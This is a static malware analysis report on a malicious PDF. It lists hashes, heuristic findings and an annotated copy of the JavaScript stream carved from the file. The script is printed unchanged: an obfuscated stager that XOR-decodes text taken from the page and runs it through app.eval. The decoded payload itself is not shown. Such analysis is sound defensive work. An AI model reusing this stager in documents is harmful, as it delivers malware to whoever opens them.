Malicious PDF — malware analysis report

Static analysis result for SHA-256 7cc755840028cdaf…

MALICIOUS

PDF

6.5 KB Created: 2010-10-17 04:41:40 Authoring application: Mofijilegilozisauafotego (via 00db0Wkeqwixiqe) First seen: 2026-05-08
MD5: 8e5372da49188aca818173a720796f17 SHA-1: 4ceb2991c18a5cd0d92b64fc24b39b8548ba2d2a SHA-256: 7cc755840028cdaf76aeb84d8be099c94eadf5f120256b6e832da99be0fe6a67
86 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Page-word XOR JavaScript eval stager — high — PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action — low — 1 related finding — PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream — low — PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0011_000.js | pdf-javascript-stream | PDF /JS object 11 at offset 0x1250 | 1537 bytes
SHA-256: e908354ca8a5ec66f5aee96d41b97d4ae2a1df9cf0bcaf4e4300a85f1f21270e
Preview script
First 1,000 lines of the extracted script
// Analyst annotations only: every code token below is unchanged from the carved stream.
// lG: global regex matching any single filler character from the set & A @ D ~ # _ ! k.
// Further down, the script applies it to wLGL to strip that filler out.
var lG=/[&A@D~#_\!k]/g;
// Builds the string "length" from fragments; not referenced again in the visible listing.
var hCN="le"+"ng"+"th";
// wLGL: the next stage, held as a string with filler characters scattered through it so that
// names such as "eval", "getPageNumWords" and "pageNum" do not appear intact in this literal.
// With the filler removed, the text:
//   - takes `this.l` as its working object and builds a lookup table of method names
//     (getPageNthWord, getPageNumWords, pageNum, eval, join);
//   - reads every word of the current page via getPageNumWords/getPageNthWord and joins them
//     into one string;
//   - walks that string two characters at a time, parses each pair as base 16, XORs it with 161,
//     and turns the result into a character through app.eval on a "\xNN" escape;
//   - stores the last 332 decoded characters in nCF and the rest in tMB, then passes tMB to app.eval.
// The app.eval(tMB) call sits in a catch handler after a call to hIV(), which is not defined in the
// visible listing — presumably the call is expected to throw; confirm against the full stream.
// Triage note: the payload is taken from the page text, so this /JS stream alone does not contain it.
var wLGL="var ePMJ=_this.l;try {var n={    hYL : \'getPageNthWord\',jQV : \'getPageNumWord_@s\',rGH : \'pakgeNu~m\',bSH : \'e_!val\',nS~kT :@# \'join\',};zWV = 161 ;vkKT=\'\';jDkSB=\'\';pWL=0;zKP=String;tOT=\'\\\\x\';r&QX=\'toString\';tSR=1;bOZ=2;zKPK=4;rYZA=5;vUF=255;pCPE=16;tQB=\'doc\';hKN=332;pET=[];pCP=\'\';bUZ=ePMJ[n.AjQV](ePMJ[n.rGH]);for(dCN=pWL;dCN< bUZ; dCN++){var dMR=ePMJ[n.hYL](eP__MJ[n.rGH],dCN,tSR);@&jSB=[jSB,dMR]!![n!.n#ST](vKT);;}for(dCN=0;dCN <& k!jSB.length; dCN+=bOZ){aFCT=jSB.substr(dCN,bOZ);pIT=parseInt(aFCT,pCPE);pOZ=pIT^zWV;nGR=pOZ.toString(pCPE);nGR=(nGR.length==tSR) ?k@ \'0\' + nGR : nGR;app[n.bSH](\'xQH=(\"\'+tOT+nGR+\'\"&A);\');pET.push(xQH);}try {pCP=pET.join(vKT)!;ePMJ.nCF=(pCP.substr(pCP.length-hKN));ePMJ.tMB=(p_CP.substr(pWL,pCP.length-hKN));h_IV(~k);} Acatch(fYV){if(ePMJ.tMB){try {app[n.bSHk](e&_PMJ.tMB_&);} catch~#(fYV)!#{}}_& else {}}} catch(pCP){app.alert(pCP.message);}";
// fE(eZAD, x): returns eZAD + x (addition or string concatenation, per the + operator).
// Not called anywhere in the visible listing — presumably filler; confirm against the full stream.
function fE(eZAD,x){return eZAD+x};
// Property names that the script later uses through bracket access are held in variables here.
// zOT: String object "replace" ("repl" plus the first three characters of "ace7pB").
var zOT=new String("repl"+"ace7pB".substr(0,3));
// dAF: the string "eval"; used below as a computed property name on the wrapped object.
var dAF=String("eval");
// nKB: the string "prototype", assembled from three fragments.
var nKB="pro"+"tot"+"ype";
// vKT: empty string; it is the replacement value when filler is stripped from wLGL.
var vKT='';


// pWL: zero. The stage text in wLGL also assigns pWL=0 and uses it as a loop start and substr offset.
var pWL=0;
// jAB(vUZ): constructor that stores its argument on the new object under both pKV and l.
// Later in the script it is constructed with the top-level `this`, and eval is reached through `l`.
function jAB(vUZ){this.pKV=this.l=vUZ};
// tQB: the top-level `this` when the script starts.
// NOTE(review): for document-level PDF JavaScript this is presumably the Doc object — confirm.
var tQB=this;
;



// De-obfuscation step: zOT is "replace" and vKT is '', so this is wLGL.replace(lG, '').
// It removes every filler character matched by lG and leaves the stage text in wLGL.
// For static analysis, the value of wLGL after this line is the stage to record.
wLGL=wLGL[zOT](lG, vKT);
// Not read anywhere in the visible listing.
var vAZU=false;


// Assigned without `var`; not read anywhere in the visible listing.
vYV=["lSBM","oZQH"];
;


// zKT: method added via jAB["prototype"] (nKB is "prototype"); it is the script's execution sink.
// It evaluates the string held in the outer variable wLGL through the object stored in this.l.
jAB[nKB].zKT = function(){
// Local that is never read.
var dO={};
// dAF is "eval", so this is this.l.eval(wLGL): the string is executed as code.
// NOTE(review): eval of a string assembled at run time; in analysis, capture wLGL rather than run it.
this.l[dAF](wLGL);
// Locals that are never read before the function returns.
var lID={nQJ:22919};var h={tG:32531};var dW=[];
}

// Two objects and an array (r is assigned without `var`); none is read in the visible listing.
var fCV={bGN:false};var zWJ={z:false};r=["sP"];

// Wraps tQB (the top-level `this`) in a jAB instance, making it reachable as tUT.l.
var tUT=new jAB(tQB);



// Sets and then decrements three numeric properties on the top-level `this`.
// They are not read in the visible listing — presumably filler; confirm against the full stream.
this.bUN=30491;this.bUN-=30;this.rO=23188;this.rO-=11;this.bCZ=17103;this.bCZ-=226;

// Trigger: calls zKT, which evals the stage string held in wLGL.
tUT.zKT();
;